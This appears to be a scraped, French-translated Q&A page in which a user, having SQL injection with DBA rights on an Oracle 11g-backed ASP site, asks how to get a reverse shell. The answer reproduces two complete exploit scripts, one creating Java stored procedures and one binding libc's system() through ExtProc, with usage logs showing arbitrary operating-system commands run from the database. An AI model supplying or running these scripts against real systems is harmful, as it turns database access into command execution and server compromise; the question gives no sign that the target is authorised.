web-dev-qa-db-fra.com

Oracle SQL Injection Reverse Shell

Je teste une injection SQL sur un site Web qui utilise ASP code. Je peux obtenir avec succès toutes les bases de données et toutes les tables. L'utilisateur actuel a des privilèges DBA. Je me demande comment puis-je obtenir une coquille inverse en utilisant Cette injection SQL. Oracle version est "Base de données Oracle 11G Enterprise Edition version 11.1.0.7.0"

1
user1968957

Vous pouvez essayer ces deux façons d'exécuter du code sur Oracle DBMS.

Le premier est avec Java code: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_Java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 Oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 Oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 Oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

create or replace and resolve Java source named "oraexec" as
import Java.lang.*;
import Java.io.*;
public class oraexec
{
    /*
     * Command execution module
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language Java           
name 'oraexec.execCommand(Java.lang.String)';
/

-- usage: exec dbms_Java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language Java
name 'oraexec.readFile(Java.lang.String)';
/

-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language Java
name 'oraexec.writeFile(Java.lang.String, Java.lang.String)';
/

La seconde utilise ExtProc: http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql

-- Usage example:
-- $ echo $Oracle_HOME
-- /opt/Oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/Oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 Oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit Oracle releases
create or replace library exec_Shell32 as
'$Oracle_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit Oracle releases
create or replace library exec_Shell64 as
'$Oracle_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit Oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell32
    language c;
end oracmd32;
/

-- package for 64-bit Oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell64
    language c;
end oracmd64;
/
3
Cristian Dobre